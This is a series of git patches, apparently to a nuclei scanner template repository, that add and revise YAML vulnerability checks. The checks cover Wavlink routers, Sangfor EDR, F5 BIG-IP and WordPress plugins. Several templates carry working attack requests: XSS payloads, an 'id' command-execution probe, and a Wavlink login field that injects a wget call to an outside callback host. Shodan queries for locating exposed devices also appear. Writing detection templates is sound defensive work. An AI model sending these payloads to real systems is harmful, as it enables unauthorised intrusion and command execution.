description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated diff --git a/workflows/gogs-workflow.yaml b/workflows/gogs-workflow.yaml index e1ab4de7a7..c5103b1456 100644 --- a/workflows/gogs-workflow.yaml +++ b/workflows/gogs-workflow.yaml @@ -1,7 +1,7 @@ id: gogs-workflow info: - name: Gogs Security Checks + name: Gogs (Go Git Service) - Security Checks author: daffainfo description: A simple workflow that runs all Gogs related nuclei templates on a given target. From 4ad2b7be7bb7387db86463d7a38bac75b6b7ca46 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 13 May 2022 16:39:44 -0400 Subject: [PATCH 25/68] Dashboard Content Enhancements (#4390) Dashboard Content Enhancements --- cves/2018/CVE-2018-20985.yaml | 1 - cves/2018/CVE-2018-3810.yaml | 1 - 2 files changed, 2 deletions(-) diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 4da57ce3f1..71ed01c5b8 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -36,5 +36,4 @@ requests: status: - 200 - # Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index 4602a84822..69322dfcea 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -44,5 +44,4 @@ requests: status: - 200 - # Enhanced by mp on 2022/05/13 From 3f89a324fa83854b634791662c5ae997234559c6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Sat, 14 May 2022 15:30:47 +0800 Subject: [PATCH 27/68] Create CVE-2022-30489.yaml --- cves/2022/CVE-2022-30489.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-30489.yaml diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..6d7a6408b2 --- /dev/null +++ b/cves/2022/CVE-2022-30489.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-30489 + +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: high + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + tags: xss,cve2022,wavlink + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + + matchers-condition: and + matchers: + - type: word + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4e8701a61a97e3ab4049b87e927f80cd09fd4206 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 May 2022 15:56:45 +0530 Subject: [PATCH 28/68] using variables instead of payloads --- cves/2022/CVE-2022-1388.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index e485e626c0..ec2987aa1b 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -25,6 +25,7 @@ info: variables: auth: "admin:" + cmd: "echo CVE-2022-1388 | rev" requests: - raw: @@ -54,10 +55,6 @@ requests: "utilCmdArgs": "-c '{{cmd}}'" } - payloads: - cmd: - - 'echo CVE-2022-1388 | rev' - stop-at-first-match: true matchers-condition: and matchers: From 1cb764709e0c1368d5a0e7f3f50c59c9f6543ac6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 16:35:15 +0530 Subject: [PATCH 30/68] Create CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cnvd/2020/CNVD-2020-46552.yaml diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..20bc744c8b --- /dev/null +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -0,0 +1,35 @@ +id: CNVD-2020-46552 +info: + name: Sangfor EDR Tool RCE + author: ritikchaddha + severity: critical + description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + tags: cnvd,cnvd2020,sangfor,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "$show_input = function($info)" + - "$strip_slashes($host)" + condition: and + + - type: word + part: body + words: + - "uid=0(root)" + + - type: status + status: + - 200 From d9746db4f35521fc4e0cc5f2e850947fbb02b260 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 22:21:49 +0530 Subject: [PATCH 31/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 25 +++++++++++-------------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 20bc744c8b..6727df6300 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -15,21 +15,18 @@ requests: path: - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - + matchers-condition: or matchers: - - type: word - part: body - words: - - "$show_input = function($info)" - - "$strip_slashes($host)" + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'status_code == 200' condition: and - - type: word - part: body - words: - - "uid=0(root)" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(body, "uid=0(root)")' + - 'status_code == 200' + condition: and From 651dd7674ee30aaf23f556e4472a6d481872cce0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 22:23:47 +0530 Subject: [PATCH 32/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 6727df6300..8d1a9d324f 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -15,7 +15,7 @@ requests: path: - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - + matchers-condition: or matchers: - type: dsl From dd63461ec109b125cccb05215f6d828fc8e23dd7 Mon Sep 17 00:00:00 2001 From: gy741 Date: Sun, 15 May 2022 08:01:56 +0900 Subject: [PATCH 33/68] Update CVE-2022-30525.yaml (#4396) shodan query added Signed-off-by: GwanYeong Kim --- cves/2022/CVE-2022-30525.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml index 359020a92e..d16b0266ff 100644 --- a/cves/2022/CVE-2022-30525.yaml +++ b/cves/2022/CVE-2022-30525.yaml @@ -10,6 +10,8 @@ info: - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - https://github.com/rapid7/metasploit-framework/pull/16563 - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + metadata: + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" tags: rce,zyxel,cve,cve2022,firewall,unauth requests: From a3ce25a5a6bf0ce25673c31a70cb1baa3e3f734f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 15 May 2022 04:32:53 +0530 Subject: [PATCH 35/68] Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml --- cves/2021/CVE-2021-25075.yaml | 54 +++++++++++++++++++ .../wordpress/seo-redirection-xss.yaml | 53 ++++++++++++++++++ 2 files changed, 107 insertions(+) create mode 100644 cves/2021/CVE-2021-25075.yaml create mode 100644 vulnerabilities/wordpress/seo-redirection-xss.yaml diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml new file mode 100644 index 0000000000..7f86e9332d --- /dev/null +++ b/cves/2021/CVE-2021-25075.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-25075 + +info: + name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS + author: DhiyaneshDK + severity: medium + description: | + The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. + remediation: Fixed in version 1.5.1. + reference: + - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p + + - | + GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" + - "toplevel_page_wpda_duplicate_post_menu" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml new file mode 100644 index 0000000000..f690939fcb --- /dev/null +++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -0,0 +1,53 @@ +id: seo-redirection-xss + +info: + name: SEO Redirection < 7.4 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 7.4. + reference: + - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea + tags: wordpress,xss,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E + + - | + GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "settings_page_seo-redirection" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From b7915d49b7afe1297b1dbb9ed48299a7cbc9221f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 14 May 2022 23:03:09 +0000 Subject: [PATCH 36/68] Auto Generated New Template Addition List [Sat May 14 23:03:09 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index f054a196e8..b17ec88509 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,4 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml +cves/2021/CVE-2021-25075.yaml +vulnerabilities/wordpress/seo-redirection-xss.yaml From 3f66b769c1ca0704f4be786ac2c49011ff1306e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 14 May 2022 23:03:15 +0000 Subject: [PATCH 37/68] Auto Generated CVE annotations [Sat May 14 23:03:15 UTC 2022] :robot: --- cves/2021/CVE-2021-25075.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml index 7f86e9332d..00192d9b93 100644 --- a/cves/2021/CVE-2021-25075.yaml +++ b/cves/2021/CVE-2021-25075.yaml @@ -3,7 +3,7 @@ id: CVE-2021-25075 info: name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS author: DhiyaneshDK - severity: medium + severity: low description: | The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. remediation: Fixed in version 1.5.1. @@ -11,6 +11,11 @@ info: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N + cvss-score: 3.50 + cve-id: CVE-2021-25075 + cwe-id: CWE-862 requests: - raw: From 22ab0f9d53ec0235681b766e481b0184b1f7dd21 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 15 May 2022 04:48:52 +0530 Subject: [PATCH 38/68] minor matcher update --- cves/2021/CVE-2021-25075.yaml | 5 +++-- vulnerabilities/wordpress/seo-redirection-xss.yaml | 3 ++- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml index 00192d9b93..2d8145956b 100644 --- a/cves/2021/CVE-2021-25075.yaml +++ b/cves/2021/CVE-2021-25075.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25075 info: - name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS + name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS author: DhiyaneshDK severity: low description: | @@ -10,12 +10,12 @@ info: reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N cvss-score: 3.50 cve-id: CVE-2021-25075 cwe-id: CWE-862 + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -48,6 +48,7 @@ requests: words: - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - "toplevel_page_wpda_duplicate_post_menu" + condition: and - type: word part: header diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml index f690939fcb..41362a0a81 100644 --- a/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -1,7 +1,7 @@ id: seo-redirection-xss info: - name: SEO Redirection < 7.4 - Reflected Cross-Site Scripting + name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting author: DhiyaneshDK severity: medium description: | @@ -42,6 +42,7 @@ requests: words: - "" - "settings_page_seo-redirection" + condition: and - type: word part: header From 5f9e6f8b4d06e06f97a5f27e91651e712e118d6c Mon Sep 17 00:00:00 2001 From: idealphase Date: Sun, 15 May 2022 06:20:39 +0700 Subject: [PATCH 40/68] Added kubernetes-operational-view-detect.yaml & updated favicon-detection.yaml (#4393) * Updated favicon-detection.yaml Added Kubernetes Operational View favicon * Added kubernetes-operational-view-detect.yaml Added kubernetes-operational-view-detect.yaml --- technologies/favicon-detection.yaml | 5 +++ .../kubernetes-operational-view-detect.yaml | 34 +++++++++++++++++++ 2 files changed, 39 insertions(+) create mode 100644 technologies/kubernetes-operational-view-detect.yaml diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 5df4a770b5..9811f35c36 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2600,3 +2600,8 @@ requests: name: "Gradle-enterprise" dsl: - "status_code==200 && (\"1614287628\" == mmh3(base64_py(body)))" + + - type: dsl + name: "Kubernetes-Operational-View" + dsl: + - "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))" diff --git a/technologies/kubernetes-operational-view-detect.yaml b/technologies/kubernetes-operational-view-detect.yaml new file mode 100644 index 0000000000..151f7f1d6e --- /dev/null +++ b/technologies/kubernetes-operational-view-detect.yaml @@ -0,0 +1,34 @@ +id: kubernetes-operational-view-detect + +info: + name: Kubernetes Operational View Detect + author: idealphase + severity: info + reference: + - https://github.com/hjacobs/kube-ops-view + - https://codeberg.org/hjacobs/kube-ops-view + metadata: + verified: true + shodan-query: http.title:"Kubernetes Operational View" + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Kubernetes Operational View" + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'Kubernetes Operational View (.+)<\/title>' From a48dbc382ff6c09702409e1a75e5897adb194360 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 14 May 2022 23:20:55 +0000 Subject: [PATCH 41/68] Auto Generated New Template Addition List [Sat May 14 23:20:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b17ec88509..44253d5011 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml From 1a5427c41555e2a0872132e72c6762c401ec2a44 Mon Sep 17 00:00:00 2001 From: Arm!tage <48816467+An0th3r@users.noreply.github.com> Date: Sun, 15 May 2022 08:25:05 +0800 Subject: [PATCH 42/68] Fix yonyou product name, add tag yonyou-ufida-nc to CNVD-2021-30167.yaml (#4388) * Change weblogic-workflow.yaml file privilege * Change yonyou product name * Add Yonyou-ufida-nc workflow template * misc update * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> --- cnvd/2021/CNVD-2021-30167.yaml | 3 +-- technologies/fingerprinthub-web-fingerprints.yaml | 2 +- ...ngyou-u8-oa-sqli.yaml => yonyou-u8-oa-sqli.yaml} | 6 +++--- workflows/weblogic-workflow.yaml | 0 workflows/yonyou-nc-workflow.yaml | 13 +++++++++++++ 5 files changed, 18 insertions(+), 6 deletions(-) rename vulnerabilities/other/{yongyou-u8-oa-sqli.yaml => yonyou-u8-oa-sqli.yaml} (87%) mode change 100755 => 100644 workflows/weblogic-workflow.yaml create mode 100644 workflows/yonyou-nc-workflow.yaml diff --git a/cnvd/2021/CNVD-2021-30167.yaml b/cnvd/2021/CNVD-2021-30167.yaml index ea26c8930d..d3ef8cc275 100644 --- a/cnvd/2021/CNVD-2021-30167.yaml +++ b/cnvd/2021/CNVD-2021-30167.yaml @@ -7,7 +7,7 @@ info: reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd,cnvd2021 + tags: beanshell,rce,cnvd,cnvd2021,yonyou requests: - raw: @@ -27,7 +27,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "uid=" diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 7beb1c7a3c..e9c7fdd205 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -14461,7 +14461,7 @@ requests: - /yimioa.apk - type: word - name: yongyou-ism + name: yonyou-ism words: - sheight*window.screen.deviceydpi diff --git a/vulnerabilities/other/yongyou-u8-oa-sqli.yaml b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml similarity index 87% rename from vulnerabilities/other/yongyou-u8-oa-sqli.yaml rename to vulnerabilities/other/yonyou-u8-oa-sqli.yaml index f572945783..e65cbf9cab 100644 --- a/vulnerabilities/other/yongyou-u8-oa-sqli.yaml +++ b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml @@ -1,12 +1,12 @@ -id: yongyou-u8-oa-sqli +id: yonyou-u8-oa-sqli info: - name: Yongyou U8 OA Sqli + name: Yonyou U8 OA Sqli author: ritikchaddha severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: yongyou,u8,oa,sqli + tags: yonyou,oa,sqli requests: - method: GET diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml old mode 100755 new mode 100644 diff --git a/workflows/yonyou-nc-workflow.yaml b/workflows/yonyou-nc-workflow.yaml new file mode 100644 index 0000000000..4d0e27a715 --- /dev/null +++ b/workflows/yonyou-nc-workflow.yaml @@ -0,0 +1,13 @@ +id: yonyou-ufida-nc-workflow + +info: + name: Yonyou Ufida NC Security Checks + author: Arm!tage + description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target. + +workflows: + - template: technologies/fingerprinthub-web-fingerprints.yaml + matchers: + - name: yonyou-ism + subtemplates: + - tags: yonyou \ No newline at end of file From e469e6eb1e1156294c2cdab5b558be29976055b8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 00:25:24 +0000 Subject: [PATCH 43/68] Auto Generated New Template Addition List [Sun May 15 00:25:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 44253d5011..226ebf3760 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml +workflows/yonyou-nc-workflow.yaml From 92a3a765ee3e8297fdf95dc2d807c827ec9c382f Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:22:18 +0530 Subject: [PATCH 44/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 8d1a9d324f..690f94e80f 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -1,6 +1,6 @@ id: CNVD-2020-46552 info: - name: Sangfor EDR Tool RCE + name: Sangfor EDR Tool - Remote Code Execution author: ritikchaddha severity: critical description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host. @@ -13,20 +13,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - matchers-condition: or matchers: - type: dsl dsl: - 'contains(body, "$show_input = function($info)")' - 'contains(body, "$strip_slashes($host)")' - - 'status_code == 200' - condition: and - - - type: dsl - dsl: - - 'contains(body, "uid=0(root)")' + - 'contains(body, "Log Helper")' - 'status_code == 200' condition: and From 1602146db29998bcb129c390913c2d846e3c0391 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 10:54:48 +0000 Subject: [PATCH 45/68] Auto Generated New Template Addition List [Sun May 15 10:54:48 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 226ebf3760..b491287495 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml From ed850529fc88952377d7ba053980648b43ec167b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:30:27 +0530 Subject: [PATCH 46/68] Update CVE-2022-30489.yaml --- cves/2022/CVE-2022-30489.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml index 6d7a6408b2..0e57f0c1f5 100644 --- a/cves/2022/CVE-2022-30489.yaml +++ b/cves/2022/CVE-2022-30489.yaml @@ -8,8 +8,9 @@ info: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 metadata: + verified: true shodan-query: http.title:"Wi-Fi APP Login" - tags: xss,cve2022,wavlink + tags: xss,cve2022,wavlink,cve,router,iot requests: - raw: @@ -25,6 +26,8 @@ requests: - type: word words: - '<script>alert(document.domain);</script>' + - 'parent.location.replace("http://")' + condition: and - type: word part: header From 69e56285193955f4104f66d9a066cc765f2bf136 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 11:05:18 +0000 Subject: [PATCH 47/68] Auto Generated New Template Addition List [Sun May 15 11:05:18 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b491287495..b56e15a13a 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +cves/2022/CVE-2022-30489.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml workflows/yonyou-nc-workflow.yaml From 22f054cf0c8339cf6555a408e36cbb2a952781a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:47:36 +0530 Subject: [PATCH 48/68] Update CVE-2020-13117.yaml --- cves/2020/CVE-2020-13117.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 9f238d5550..11bdb17c11 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -13,7 +13,10 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - tags: cve,cve2020,wavlink,rce,oast + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2020,wavlink,rce,oast,router requests: - raw: @@ -26,8 +29,18 @@ requests: newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: body + words: + - "parent.location.replace" + + - type: status + status: + - 200 From 443d4d238b9c0082cbee4f943058854fb2f115a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 18:20:37 +0530 Subject: [PATCH 49/68] Create unauth-wavink-panel.yaml --- misconfiguration/unauth-wavink-panel.yaml | 44 +++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 misconfiguration/unauth-wavink-panel.yaml diff --git a/misconfiguration/unauth-wavink-panel.yaml 